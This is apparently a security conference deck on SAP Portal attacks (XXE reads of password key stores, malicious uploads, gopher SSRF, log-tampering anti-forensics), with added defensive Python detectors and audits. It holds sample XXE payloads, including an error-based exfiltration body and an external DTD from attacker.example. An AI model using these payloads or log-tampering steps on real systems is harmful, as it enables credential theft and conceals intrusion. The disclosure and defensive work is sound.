• Found a file in the OS of SAP Portal with keys to decrypt passwords

• Found a vulnerability (another one ;)) which allows reading the files with passwords and keys

• Decrypt passwords and log into Portal

• PROFIT!

Page 56

Read the file

How can we read the file?

• Directory Traversal

• OS Command execution

• XML External Entity (XXE)

Page 57

XXE in Portal: Details

• Injection of malicious entity declarations into XML requests
• Can lead to unauthorized file read, DoS, SSRF
• There is an XXE vulnerability in SAP Portal
• Can be exploited by modification of a POST request
• It is possible to read any file from the OS, and much more

Page 58

XXE in Portal

Page 59

XXE in Portal

Page 60

XXE

Error based XXE

Page 61

XXE in Portal: Result

• We can read any file
• Including config with passwords
• The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here: \usr\sap\<SID>\SYS\global\security\data\SecStore.properties
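An added example, not from the deck: since the deck's own point (slide 69) is that POST bodies are only recoverable from the HTTP trace, this is a detector to run over captured request bodies for the XXE variants the slides mention, i.e. an external entity pointing at a file, a parameter entity, the error-based form that smuggles file content into a failing entity name, and an external DTD. The vulnerable endpoint is not named because the deck does not publish it; the request bodies are constructed samples, one of them aimed at the SecStore.properties path above, and the attacker host in the last one is made up.

```python
"""Detect XXE attempts in captured XML request bodies. Added example; samples are constructed."""
import re

# <!ENTITY [%] name SYSTEM "uri"> or <!ENTITY [%] name PUBLIC "id" "uri">
ENTITY = re.compile(
    r"<!ENTITY\s+(?P<param>%)?\s*(?P<name>[\w.-]+)\s+"
    r"(?:SYSTEM|PUBLIC\s+(?P<q1>[\"'])[^\"']*(?P=q1))\s*(?P<q2>[\"'])(?P<uri>[^\"']*)(?P=q2)",
    re.IGNORECASE)
# <!DOCTYPE root SYSTEM "uri"> : the whole DTD is fetched from elsewhere
EXTERNAL_SUBSET = re.compile(
    r"<!DOCTYPE\s+[\w.-]+\s+(?:SYSTEM|PUBLIC\s+([\"'])[^\"']*\1)\s*([\"'])(?P<uri>[^\"']*)\2",
    re.IGNORECASE)
# A system literal that embeds a parameter-entity reference: the error-based exfiltration trick
ERROR_BASED = re.compile(r"(?:SYSTEM|PUBLIC\s+[\"'][^\"']*[\"'])\s*[\"'][^\"']*%[\w.-]+;", re.IGNORECASE)


def classify(uri: str) -> str:
    u = uri.lower()
    if u.startswith(("file:", "jar:", "netdoc:")):
        return "file-read"
    if u.startswith(("http:", "https:", "ftp:", "gopher:")):
        return "ssrf"
    return "external"


def detect_xxe(body: str) -> list:
    findings = []
    for m in ENTITY.finditer(body):
        kind = ("param-" if m.group("param") else "") + classify(m.group("uri"))
        findings.append({"kind": kind, "name": m.group("name"), "uri": m.group("uri")})
    m = EXTERNAL_SUBSET.search(body)
    if m:
        findings.append({"kind": "external-dtd", "name": None, "uri": m.group("uri")})
    if ERROR_BASED.search(body):
        findings.append({"kind": "error-based-exfil", "name": None, "uri": None})
    return findings


def is_xxe(body: str) -> bool:
    return bool(detect_xxe(body))


SECSTORE = "/usr/sap/TTT/SYS/global/security/data/SecStore.properties"
# Constructed bodies; the element names are placeholders, not the portal's real request format.
BENIGN = '<?xml version="1.0"?><request><systemid>MS_EXCHANGE</systemid></request>'
FILE_READ = ('<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "file://' + SECSTORE + '">]>'
             '<request><systemid>&xxe;</systemid></request>')
ERROR_BASED_BODY = (
    '<?xml version="1.0"?><!DOCTYPE r ['
    '<!ENTITY % file SYSTEM "file:///usr/sap/TTT/SYS/global/security/data/SecStore.key">'
    '<!ENTITY % eval "<!ENTITY &#x25; err SYSTEM \'file:///nonexistent/%file;\'>">'
    '%eval;%err;]><request/>')
EXTERNAL_DTD = '<?xml version="1.0"?><!DOCTYPE r SYSTEM "http://attacker.example/evil.dtd"><request/>'

if __name__ == "__main__":
    for body in (BENIGN, FILE_READ, ERROR_BASED_BODY, EXTERNAL_DTD):
        print(detect_xxe(body))
```

The error-based body is the one to keep in mind when reading traces: the file entity alone proves nothing was returned inline, the nested declaration is what carries the key file's content out in an error message, and the regexes flag it even though the inner `<!ENTITY &#x25; ...>` is not a syntactically normal declaration.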

Page 62

Where are the passwords? (config.properties)

rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1

secstorefs.secfile names the file that holds the encrypted passwords.

Page 63

Page 64

SecStore.properties

$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E

But where is the key?

Page 65

rdbms.maximum_connections=5

system.name=TTT

secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/

data/SecStore.key

secstorefs.secfile=/oracle/TTT/sapmnt/global/security/

data/SecStore.properties

secstorefs.lib=/oracle/TTTsapmnt/global/security/lib

rdbms.driverLocation=/oracle/client/10x_64/instantclie

nt/ojdbc14.jar

rdbms.connection=jdbc/pool/TTT

rdbms.initial_connections=1

config.properties

erpscan.com 65ERPScan — invest in security to secure investments

Page 66

Get the password

• We have an encrypted password

• We have a key to decrypt it

We got the J2EE admin and JDBC login:password!

Page 67

Prevention

• Install SAP note 1619539

• Restrict read access to the files SecStore.properties and SecStore.key
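The two prevention points above (patch, then lock down the secure store files) are easy to verify on a running system. The following is an added example, not code from the deck or from SAP: it parses the config.properties tail shown on the previous slides to find the paths named in secstorefs.keyfile and secstorefs.secfile, then reports any group or world read/write permission on them. The sample configuration and the stat modes passed to audit() are constructed so the check runs offline; the __main__ block shows the real-filesystem call.

```python
"""Added example (not from the ERPScan deck or SAP): locate the secure store
files named in config.properties and check that only the owner can read them.
SAMPLE_CONFIG and the modes used in the test are constructed values."""
import re
import stat
from typing import Dict, List

# Constructed sample in the layout of the config.properties tail on the slides
SAMPLE_CONFIG = """\
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
secstorefs.lib=/oracle/TTT/sapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
"""

SECURE_STORE_KEYS = ("secstorefs.keyfile", "secstorefs.secfile")


def parse_properties(text: str) -> Dict[str, str]:
    """Minimal Java .properties reader: '#'/'!' comments, key=value or
    key:value, and backslash line continuations."""
    props: Dict[str, str] = {}
    pending: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not pending and (not line or line[0] in "#!"):
            continue
        if line.endswith("\\"):
            pending.append(line[:-1])
            continue
        pending.append(line)
        logical = "".join(pending)
        pending = []
        m = re.match(r"([^=:\s]+)\s*[=:]?\s*(.*)", logical)
        if m:
            props[m.group(1)] = m.group(2)
    return props


def secure_store_files(props: Dict[str, str]) -> List[str]:
    """Paths of the key file and the encrypted store, in that order."""
    return [props[k] for k in SECURE_STORE_KEYS if k in props]


def exposed_permissions(mode: int) -> List[str]:
    """Permission problems for a st_mode value: any group/other read or write
    bit lets a local non-SAP account copy the key or the encrypted store."""
    problems = []
    if mode & (stat.S_IRGRP | stat.S_IWGRP):
        problems.append("group-accessible")
    if mode & (stat.S_IROTH | stat.S_IWOTH):
        problems.append("world-accessible")
    return problems


def audit(props: Dict[str, str], stat_modes: Dict[str, int]) -> Dict[str, List[str]]:
    """stat_modes maps path -> st_mode; it is injected so the check is testable
    without touching the filesystem."""
    report = {}
    for path in secure_store_files(props):
        if path not in stat_modes:
            report[path] = ["missing"]
        else:
            report[path] = exposed_permissions(stat_modes[path])
    return report


if __name__ == "__main__":
    import os
    props = parse_properties(SAMPLE_CONFIG)
    modes = {p: os.stat(p).st_mode for p in secure_store_files(props) if os.path.exists(p)}
    for path, problems in audit(props, modes).items():
        print(path, "OK" if not problems else ", ".join(problems))
```

Run it as the SAP administration user on each instance host; a "missing" result for the key file usually means the store lives on a shared sapmnt mount whose permissions must be checked there instead.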

Page 68

Investigation

POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fadministrator!2fsuper_admin!2fsuper_admin_role!2fcom.sap.portal.content_administration!2fcom.sap.portal.content_admin_ws!2fcom.sap.km.AdminContent!2fcom.sap.km.AdminContentExplorer!2fcom.sap.km.AdminExplorer/ HTTP/1.1

Page 69

Investigation

• The only way to get HTTP POST request values is to enable HTTP Trace

• Visual Administrator → Dispatcher → HTTP Provider → Properties: HttpTrace = enable

• For 6.4 and 7.0 SP12 and lower:

– On Dispatcher: /j2ee/cluster/dispatcher/log/defaultTrace.trc

– On Server: \j2ee\cluster\server0\log\system\httpaccess\responses.0.trc

• For 7.0 SP13 and higher: /j2ee/cluster/dispatcher/log/services/http/req_resp.trc

• Manually analyze all requests for XXE attacks
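Manual review of every traced POST body does not scale, so a first automated pass is worth having. The block below is an added example, not code from the deck or from SAP: it splits a captured trace into requests and flags POST bodies carrying the XML constructs that XXE depends on (DOCTYPE with an internal subset, external or parameter entity declarations, external DTD references). The trace layout in SAMPLE_TRACE is constructed; SAP's req_resp.trc format is not reproduced here, so split_requests() must be adapted to the real file before use.

```python
"""Added example (not from the ERPScan deck or SAP): flag traced POST request
bodies that contain XXE indicators. The '--- request ---' trace layout and the
sample requests are constructed for illustration."""
import re
from typing import Dict, List

SAMPLE_TRACE = """\
--- request ---
POST /irj/servlet/prt/portal/prtroot/com.sap.km.AdminExplorer HTTP/1.1
Host: portal.example.internal
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<root>&xxe;</root>
--- request ---
POST /irj/servlet/prt/portal/prtroot/com.sap.km.AdminExplorer HTTP/1.1
Host: portal.example.internal
Content-Type: text/xml

<?xml version="1.0"?>
<root><item>ordinary payload</item></root>
--- request ---
GET /irj/portal HTTP/1.1
Host: portal.example.internal

"""

# The constructs a reviewer would look for by hand; each gets a label so the
# report says *why* a request was flagged.
XXE_PATTERNS = {
    "external-entity": re.compile(r"<!ENTITY\s+%?\s*\w+\s+(SYSTEM|PUBLIC)\b", re.I),
    "external-dtd": re.compile(r"<!DOCTYPE\s+\w+\s+(SYSTEM|PUBLIC)\b", re.I),
    "parameter-entity": re.compile(r"<!ENTITY\s+%", re.I),
    "internal-dtd": re.compile(r"<!DOCTYPE[^>]*\[", re.I),
}


def split_requests(trace: str) -> List[Dict[str, str]]:
    """Turn the constructed trace into {method, path, body} records.
    Headers and body are separated by the first blank line, as in HTTP."""
    records = []
    for chunk in trace.split("--- request ---"):
        chunk = chunk.strip("\n")
        if not chunk.strip():
            continue
        head, _, body = chunk.partition("\n\n")
        request_line = head.splitlines()[0]
        method, path = request_line.split(" ")[:2]
        records.append({"method": method, "path": path, "body": body})
    return records


def classify(body: str) -> List[str]:
    """Names of the XXE indicators present in one request body."""
    return [name for name, rx in XXE_PATTERNS.items() if rx.search(body)]


def find_xxe(trace: str) -> List[Dict[str, object]]:
    """Only POST bodies are inspected; GETs carry no XML body to parse."""
    hits = []
    for index, rec in enumerate(split_requests(trace)):
        if rec["method"] != "POST":
            continue
        indicators = classify(rec["body"])
        if indicators:
            hits.append({"index": index, "path": rec["path"], "indicators": indicators})
    return hits


if __name__ == "__main__":
    for hit in find_xxe(SAMPLE_TRACE):
        print(hit)
```

An internal DTD by itself is not proof of an attack, which is why the report lists the indicators rather than a verdict; a hit with external-entity or parameter-entity is the one to pull the full request and response for.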

Page 70

Malicious file upload: Attack

• Knowledge Management allows uploading to the server different types of files that can carry malicious content

• Sometimes, if guest access is allowed, any file can be uploaded without being an authenticated user

• For example, it can be an HTML file with JavaScript that steals cookies

Page 71

Malicious file upload: Attack

Page 72

Malicious file upload: Attack

Page 73

Malicious file upload: Forensics

[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968

[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165

*Again, images can help us.
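The trick on this slide, inferring the uploaded file type from the MIME icon the browser fetches right after the upload POST, can be scripted over a whole access log. The block below is an added example, not from the deck or from SAP: it parses lines in the layout shown above, pairs each POST to the DocsExplorer/documents upload path with the next mimes/images/<ext>.gif request from the same client inside a short window, and marks the risky types. The log lines are constructed (the first pair mirrors the slide; the second is invented), and the time window and risky-extension list are assumptions to tune.

```python
"""Added example (not from the ERPScan deck or SAP): correlate KM upload POSTs
with the MIME icon GET that follows them to recover the uploaded file type.
SAMPLE_LOG, RISKY_EXTENSIONS and the 5-second window are constructed/assumed."""
import re
from datetime import datetime, timedelta
from typing import Dict, List, Optional

SAMPLE_LOG = """\
[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165
[Apr 10, 2013 2:31:02 AM ] - 192.168.192.40 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13811
[Apr 10, 2013 2:31:03 AM ] - 192.168.192.40 : GET /irj/go/km/docs/etc/public/mimes/images/pdf.gif HTTP/1.1 200 172
"""

LINE_RE = re.compile(
    r"\[(?P<ts>[^\]]+?)\s*\]\s*-\s*(?P<ip>\S+)\s*:\s*(?P<method>[A-Z]+)\s+"
    r"(?P<path>\S+)\s+HTTP/\S+\s+(?P<status>\d+)\s+(?P<size>\d+)"
)
TIME_FORMAT = "%b %d, %Y %I:%M:%S %p"
UPLOAD_PATH_SUFFIX = "com.sap.km.DocsExplorer/documents"
MIME_ICON_RE = re.compile(r"/mimes/images/([A-Za-z0-9]+)\.gif$")
# Assumed list of active-content types worth pulling for review
RISKY_EXTENSIONS = {"html", "htm", "js", "jsp", "hta", "exe", "jar"}


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """One access-log line -> record, or None for lines in another layout."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return {
        "time": datetime.strptime(m.group("ts"), TIME_FORMAT),
        "ip": m.group("ip"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
        "size": int(m.group("size")),
    }


def find_uploads(log_text: str, window: timedelta = timedelta(seconds=5),
                 risky=RISKY_EXTENSIONS) -> List[Dict[str, object]]:
    """For every upload POST, look ahead for the same client's MIME icon GET."""
    entries = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    uploads = []
    for i, e in enumerate(entries):
        if e["method"] != "POST" or not e["path"].endswith(UPLOAD_PATH_SUFFIX):
            continue
        ext = None
        for later in entries[i + 1:]:
            if later["time"] - e["time"] > window:
                break
            m = MIME_ICON_RE.search(later["path"])
            if later["ip"] == e["ip"] and later["method"] == "GET" and m:
                ext = m.group(1).lower()
                break
        uploads.append({"time": e["time"], "ip": e["ip"], "status": e["status"],
                        "ext": ext, "risky": ext in risky})
    return uploads


if __name__ == "__main__":
    for u in find_uploads(SAMPLE_LOG):
        print(u["time"], u["ip"], u["ext"], "REVIEW" if u["risky"] else "")
```

The icon is also fetched when a folder is merely listed, so the correlation only means something when it follows an upload POST from the same client; an upload with ext None (no icon within the window) should be checked against the repository directly.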

Page 74

Malicious file upload: Prevention

Enable File Extension and Size Filter:

• System Administration → System Configuration → Content Management → Repository → Filters → Show Advanced Options → File Extension and Size Filter

• Select either the All repositories parameter or at least one repository from the repository list in the Repositories parameter

Page 75

Malicious file upload: Prevention

Enable Malicious Script Filter:

• System Administration → System Configuration → Content Management → Repository → Filters → Show Advanced Options → Malicious Script Filter

• The filter also detects executable scripts in files that are being modified and encodes them when they are saved

– Enable Forbidden Scripts: a comma-separated list of banned script tags that will be encoded when the filter is applied

– Enable the Send E-Mail to Administrator option
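To make the two KM filters on the last two slides concrete, here is an added example (not from the deck and not SAP's implementation) that models them: an extension-and-size gate, then a forbidden-script pass that HTML-encodes the listed tags and sets a flag standing in for the "Send E-Mail to Administrator" option. The allowed-extension set, the size limit, the forbidden-tag list and the choice to scan only text-type files are assumptions.

```python
"""Added example (not from the ERPScan deck or SAP): a model of the KM File
Extension and Size Filter followed by the Malicious Script Filter. All policy
values below are constructed."""
import html
import re
from typing import Dict, Set, Tuple

# Constructed policy. html is allowed on purpose so the second filter has work
# to do: repositories that legitimately hold HTML still need script encoding.
ALLOWED_EXTENSIONS: Set[str] = {"pdf", "docx", "xlsx", "txt", "png", "jpg", "html"}
MAX_SIZE = 5 * 1024 * 1024
FORBIDDEN_SCRIPTS = "script,object,embed,iframe"   # comma-separated, as in the filter
TEXT_EXTENSIONS: Set[str] = {"txt", "html", "xml", "csv"}


def file_extension(filename: str) -> str:
    """Last extension, lower-cased; 'report.pdf.' or 'README' give ''."""
    return filename.rsplit(".", 1)[1].lower() if "." in filename else ""


def extension_and_size_filter(filename: str, size: int,
                              allowed: Set[str] = ALLOWED_EXTENSIONS,
                              max_size: int = MAX_SIZE) -> Tuple[bool, str]:
    ext = file_extension(filename)
    if ext not in allowed:
        return False, f"extension '{ext}' not allowed"
    if size > max_size:
        return False, f"size {size} exceeds limit {max_size}"
    return True, "ok"


def encode_forbidden_scripts(content: str,
                             forbidden: str = FORBIDDEN_SCRIPTS) -> Tuple[str, bool]:
    """HTML-encode opening and closing forms of every listed tag so the
    browser renders them as text. Returns (new_content, anything_found)."""
    tags = [t.strip() for t in forbidden.split(",") if t.strip()]
    pattern = re.compile(r"<(/?)(%s)\b[^>]*>" % "|".join(re.escape(t) for t in tags), re.I)
    found = False

    def repl(m: re.Match) -> str:
        nonlocal found
        found = True
        return html.escape(m.group(0))

    return pattern.sub(repl, content), found


def process_upload(filename: str, content: bytes) -> Dict[str, object]:
    """Apply both filters; notify_admin mirrors the e-mail option."""
    ok, reason = extension_and_size_filter(filename, len(content))
    result: Dict[str, object] = {"accepted": ok, "reason": reason,
                                 "content": content, "notify_admin": False}
    if not ok:
        return result
    if file_extension(filename) in TEXT_EXTENSIONS:
        text = content.decode("utf-8", errors="replace")
        cleaned, found = encode_forbidden_scripts(text)
        if found:
            result["content"] = cleaned.encode("utf-8")
            result["notify_admin"] = True
    return result


if __name__ == "__main__":
    for name, data in [("page.html", b"<h1>t</h1><script>alert(1)</script>"),
                       ("tool.exe", b"MZ"), ("notes.txt", b"plain text")]:
        print(name, process_upload(name, data))
```

The extension check looks only at the final suffix, which is the right call for a content repository: what matters is the type the server will serve, and a double extension such as evil.html.pdf is delivered as PDF.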

Page 76

Portal post-exploitation

• Lots of links to other systems in the corporate LAN

• Using SSRF, attackers can get access to these systems

What is SSRF?

Page 77

SSRF History: Basics

• We send Packet A to Service A

• Service A initiates Packet B to Service B

• Services can be on the same or different hosts

• We can manipulate some fields of Packet B within Packet A

• Various SSRF attacks depend on how many fields we can control in Packet B

(diagram: Packet A → Service A → Packet B → Service B)

Page 78

Partial Remote SSRF: HTTP attacks on other services

(diagram: HTTP Server A, Corporate network host B; Direct attack: GET /vuln.jsp sent to A; SSRF attack: GET /vuln.jsp relayed through A to B)

Page 79

Gopher URI scheme

• Using the gopher:// URI scheme, it is possible to send TCP packets

– Exploit OS vulnerabilities

– Exploit old SAP application vulnerabilities

– Bypass SAP security restrictions

– Exploit vulnerabilities in local services

More info in our BH2012 presentation:

SSRF vs. Business Critical Applications

LINK
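The SSRF slides come down to one design point for anything in the portal that fetches a URL on a user's behalf: the server must decide where Packet B may go, not the caller. The block below is an added example, not from the deck or from SAP, of that decision as a policy function: only http/https (so gopher:// and friends are refused before any socket is opened), an explicit allowlist of internal destinations, standard ports only, and a check that the name resolved to the network the allowlist expects. The hostnames, networks and the fake resolver used in the test are constructed.

```python
"""Added example (not from the ERPScan deck or SAP): an outbound-URL policy a
portal component can apply before making a server-side request. The allowlist
and networks are constructed; the resolver is injectable for offline tests."""
import ipaddress
import socket
from typing import Callable, Dict, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Constructed allowlist: hostname -> network its address must fall into.
# Pinning the network catches DNS answers that point an allowed name elsewhere.
ALLOWED_DESTINATIONS: Dict[str, str] = {
    "crm.example.internal": "10.20.0.0/16",
    "docs.example.internal": "10.30.5.0/24",
}


def validate_outbound_url(url: str,
                          allowed: Dict[str, str] = ALLOWED_DESTINATIONS,
                          resolver: Callable[[str], str] = socket.gethostbyname
                          ) -> Tuple[bool, str]:
    """Return (allowed, reason). Every rejection names the failing rule so the
    decision can be logged as a security event."""
    parts = urlsplit(url)
    scheme = (parts.scheme or "").lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"
    if parts.username or parts.password:
        return False, "userinfo in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        port = parts.port          # raises ValueError on a non-numeric port
    except ValueError:
        return False, "invalid port"
    if port not in (None, 80, 443):
        return False, f"port {port} not allowed"
    network = allowed.get(host)
    if network is None:
        return False, f"host {host!r} not on allowlist"
    try:
        addr = resolver(host)
    except (socket.gaierror, OSError):
        return False, f"cannot resolve {host!r}"
    if ipaddress.ip_address(addr) not in ipaddress.ip_network(network):
        return False, f"{host} resolved to {addr}, outside {network}"
    return True, "ok"


if __name__ == "__main__":
    for u in ["https://crm.example.internal/api/accounts",
              "gopher://crm.example.internal:70/_test",
              "http://127.0.0.1/"]:
        print(u, validate_outbound_url(u))
```

Resolve once and connect to the address you validated; validating the name and then letting an HTTP library resolve it again reopens the gap the network pin is there to close.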

Page 80

Portal post-exploitation

Page 81

Anti-forensics

Page 82

Anti-forensics

• Flooding

• Deleting

• Changing

Page 83

Anti-forensics

Log flooding

• 5 active logs

• Maximum log file size is 10 MB

• Archiving happens when all logs reach the maximum size

• If file.0.log reaches max size, then file.1.log is opened

• If file.4.log reaches max size, then all are zipped and backed up

• The same files are rewritten after archiving

Page 84

Anti-forensics

Log deleting

• SAP locks write access only to the one active log

• SAP allows reading/writing the other logs, so it is possible to delete them

• A missing log could, however, give away the attacker's presence

Log changing

• SAP locks write access only to the one active log

• It is possible to write into any other log file

Page 85

Securing SAP Portal

• Patching

• Secure configuration

• Enabling HTTP Trace with masking

• Malicious script filter

• Log archiving

• Additional place for log storage

• Monitoring of security events

– Own scripts that parse common patterns

– ERPScan has all existing web vulns/0-day patterns
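The log-flooding, log-deleting and log-changing slides all exploit the fact that the portal is the only keeper of its own logs; the "log archiving" and "additional place for log storage" points above are the answer. The block below is an added example, not from the deck or from SAP, of the integrity side of that: a manifest of size and SHA-256 taken at archive time, and a check that classifies each log as unchanged, appended, truncated, modified, deleted or new. Because SAP logs are append-only, a legitimately growing active log still hashes to the recorded digest over its recorded prefix, so only real tampering is reported. The responses.*.trc contents are constructed.

```python
"""Added example (not from the ERPScan deck or SAP): append-aware integrity
manifest for a set of rotated log files kept in a secondary location.
SNAPSHOT and LATER are constructed states of a log directory."""
import hashlib
import os
from typing import Dict


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(files: Dict[str, bytes]) -> Dict[str, Dict[str, object]]:
    """Record the size and digest of every log at archive time."""
    return {name: {"size": len(data), "sha256": sha256(data)} for name, data in files.items()}


def verify(manifest: Dict[str, Dict[str, object]], current: Dict[str, bytes]) -> Dict[str, str]:
    """Compare the live directory with the manifest. The recorded prefix of an
    append-only log must still hash to the recorded digest; a shorter file is a
    truncation, a same-or-longer file with a different prefix was edited."""
    findings: Dict[str, str] = {}
    for name, rec in manifest.items():
        if name not in current:
            findings[name] = "deleted"
            continue
        data = current[name]
        if len(data) < rec["size"]:
            findings[name] = "truncated"
        elif sha256(data[: rec["size"]]) != rec["sha256"]:
            findings[name] = "modified"
        elif len(data) > rec["size"]:
            findings[name] = "appended"
        else:
            findings[name] = "unchanged"
    for name in current:
        if name not in manifest:
            findings[name] = "new"
    return findings


def read_log_dir(path: str) -> Dict[str, bytes]:
    """Load every regular file of a log directory for a real run."""
    out: Dict[str, bytes] = {}
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if os.path.isfile(full):
            with open(full, "rb") as fh:
                out[name] = fh.read()
    return out


SNAPSHOT: Dict[str, bytes] = {
    "responses.0.trc": b"[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/portal HTTP/1.1 200 13968\n",
    "responses.1.trc": b"[Apr 9, 2013 11:58:01 PM ] - 192.168.192.22 : GET /irj/portal HTTP/1.1 200 4301\n",
    "responses.2.trc": b"[Apr 9, 2013 10:02:44 PM ] - 192.168.192.30 : GET /irj/go/km/docs/ HTTP/1.1 200 7720\n",
}
LATER: Dict[str, bytes] = {
    # active log grew normally
    "responses.0.trc": SNAPSHOT["responses.0.trc"]
    + b"[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165\n",
    # client address edited in place (same length, different bytes)
    "responses.1.trc": b"[Apr 9, 2013 11:58:01 PM ] - 192.168.192.99 : GET /irj/portal HTTP/1.1 200 4301\n",
    # responses.2.trc removed; a new rotation file appeared
    "responses.3.trc": b"",
}


if __name__ == "__main__":
    for name, state in sorted(verify(build_manifest(SNAPSHOT), LATER).items()):
        print(name, state)
```

Keep the manifest and the archived copies on a host the portal's OS user cannot write to; a manifest stored next to the logs can be rewritten by the same party that rewrote the log.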

Page 86

Conclusion

It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure

SAP Guides

It's all in your hands

Regular security assessments

ABAP code review

Monitoring technical security

Segregation of Duties

Security events monitoring

Page 87

Future work

I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:

• July 31 – BlackHat (Las Vegas, USA)

Page 88

Web: www.erpscan.com

e-mail: [email protected]

Twitter: @erpscan, @_chipik, @neyolov